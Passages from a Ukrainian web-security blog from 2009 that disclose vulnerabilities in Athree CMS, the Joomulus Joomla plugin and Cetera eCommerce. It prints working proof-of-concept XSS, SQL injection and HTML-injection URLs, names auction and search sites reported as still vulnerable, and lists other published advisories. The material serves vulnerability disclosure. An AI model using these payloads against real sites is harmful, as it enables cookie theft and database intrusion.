Websecurity - Веб безпека

05.11.2009

У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.

Раніше я вже писав про уразливості в Athree CMS.

Детальна інформація про уразливості з’явиться пізніше.

30.12.2009

XSS:

http://site/?p=1;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?p=1;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28
http://site/?p=1;c=0/*%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E;s=28

SQL DB Structure Extraction:

http://site/?p=1;a=1′

SQL Injection:

http://site/?p=1;a=version()

В даній добірці уразливості в веб додатках:

• CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability (деталі)
• Drupal 6 Content Access Module XSS (деталі)
• Drupal Embedded Media Field Module Multiple XSS (деталі)
• Achievo 1.3.4 - XSS Vulnerability (деталі)
• Arcade Trade Script XSS (деталі)
• PHP Nuke v.8.0 (referer) SQL Injection (деталі)
• Novell Groupwise fails to properly sanitize emails (деталі)
• Cross-site Request Forgery (CSRF) on Novell GroupWise WebAccess allows email theft and other attacks (деталі)
• Persistent XSS on Novell GroupWise WebAccess (деталі)
• XSS on Novell GroupWise WebAccess (деталі)

Раніше я вже розповідав про дірки на auction.ua та партнерських сайтах. Тоді я перевірив деякі з раніше мною знайдених і оприлюднених уразливостей на auction.ua (зокрема Cross-Site Scripting), чи вони ще працюють, і чи вони працюють на партнерських сайтах.

Я продовжив дане дослідження і перевірив уразливості на auction.meta.ua. З наведених уразливостей три все ще працюють при невеликій зміні коду (хоча й редиректять на трохи інші URL).

XSS (IE):

На http://auction.meta.ua:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий

На auction.ua:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

Та на партнерських сайтах:

http://souvenirs.auction.ua

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

http://auction.shram.kiev.ua

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

http://auction.ukrop.com

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

Всі веб сайти що базуються на движку auction.ua вразливі, так само як і головний сайт аукціону. А таких сайтів чимало (орієнтовно 295 партнерських сайтів).

В даній добірці уразливості в веб додатках:

• HP SiteScope SNMP Trap Script Insertion Vulnerability (деталі)
• Namad Cms Remote File Download (деталі)
• FreeSSHd Multiple Remote Stack Overflow Vulnerabilities (деталі)
• freeSSHd (stf - rename) Buffer Overflow Vulnerability (деталі)
• FreeSSHD 1.2.1 (Post Auth) Remote Seh Overflow Exploit (деталі)
• MULTIPLE REMOTE VULNERABILITIES MiniTwitter <= v0.3-Beta (деталі)
• AMember 3.1.7 - Multiple Vulnerabilities (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES Joomla Component ‘Boy Scout Advancement’ <= v-0.3 (com_bsadv) (деталі)
• Vulnerabilities in LxBlog (деталі)
• DotNetNuke ErrorPage.aspx Cross-Site Scripting Vulnerability (деталі)

У квітні, 29.04.2009, я знайшов Cross-Site Scripting, Full path disclosure, SQL Injection та Denial of Service уразливості на проекті http://rabota-i-trud.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

В новинах я регулярно згадую стосовно сайтів про пошук роботи. Останній раз я писав про уразливість на www.superjob.ua.

Детальна інформація про уразливості з’явиться пізніше.

05.08.2009

У грудні, 13.12.2008, я знайшов Cross-Site Scripting та Remote Flash Injection уразливості на проекті http://search.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

25.08.2009

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Remote Flash Injection:

Це XSS атака через Flash, яку я назвав Remote Flash Injection.

• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

Раніше я вже писав про XSS уразливість в WP-Cumulus. Така ж уразливість є і в плагіні Joomulus (mod_joomulus), що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 8 мільйонах флеш файлах.

Учора, 23.12.2009, я знайшов Cross-Site Scripting уразливість в плагіні Joomulus для Joomla. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS.

Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.

HTML Injection:

http://site/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Уразливі Joomulus 2.0 та попередні версії.

В даній добірці уразливості в веб додатках:

• CA ARCserve Backup DB Engine Denial of Service (деталі)
• CA ARCserve Backup Tape Engine Denial of Service (деталі)
• CA BrightStor ARCServe BackUp Message Engine Remote Command Injection Vulnerability (деталі)
• CA ARCserve Backup Multiple Vulnerabilities (деталі)
• MULTIPLE REMOTE VULNERABILITIES my-colex 1.4.2 (деталі)
• MULTIPLE REMOTE VULNERABILITIES my-Gesuad 0.9.14 (деталі)
• Multiple XSS in Sun Communications Express (деталі)
• (GET vars ‘x’ & ‘y’) ADMIN FUNCTION EXECUTION Jorp v1.3.05.09 (деталі)
• INSECURE COOKIE HANDLING VULNERABILITIES Dog Pedigree Online Database v1.0.1-Beta (деталі)
• (GET var ‘id’) BLIND SQL INJECTION EXPLOIT Dog Pedigree Online Database v1.0.1-Beta (деталі)

30.10.2009

У березні, 01.03.2009, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

23.12.2009

Insufficient Anti-automation:

http://site/

http://site/account/

В формах на даних сторінках відсутній захист від автоматизованих запитів (капча).

XSS:

http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі Cetera eCommerce 14.0 та попередні версії. Розробники в себе на сайті уразливості не виправили (окріх двох останніх XSS), як це видно по цій дірці:

XSS:

• alert(document.cookie)
• цікавий
• html включення

Окрім наведених уразливостей, в системі є ще persistent XSS, роботу якої я раніше вже продемонстрував розробникам системи на їх власному сайті .

В даній добірці уразливості в веб додатках:

• WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access (деталі)
• FormMail 1.92 Multiple Vulnerabilities (деталі)
• User options changer (SQLi) EXPLOIT Bigace CMS stable release 2.5 (деталі)
• Belkin BullDog Plus UPS-Service Buffer Overflow Vulnerability (деталі)
• Drupal 6 CCK Module XSS Vulnerability (деталі)
• Novell GroupWise Web Access Multiple XSS (деталі)
• MULTIPLE SQL INJECTION VULNERABILITIES Flash Quiz Beta 2 (деталі)
• IPsession SQL Injection Vulnerability (деталі)
• Drupal 6.12 (core) User Module XSS Vulnerability (деталі)
• DMXReady Registration Manager Arbitrary File Upload Vulnerability (деталі)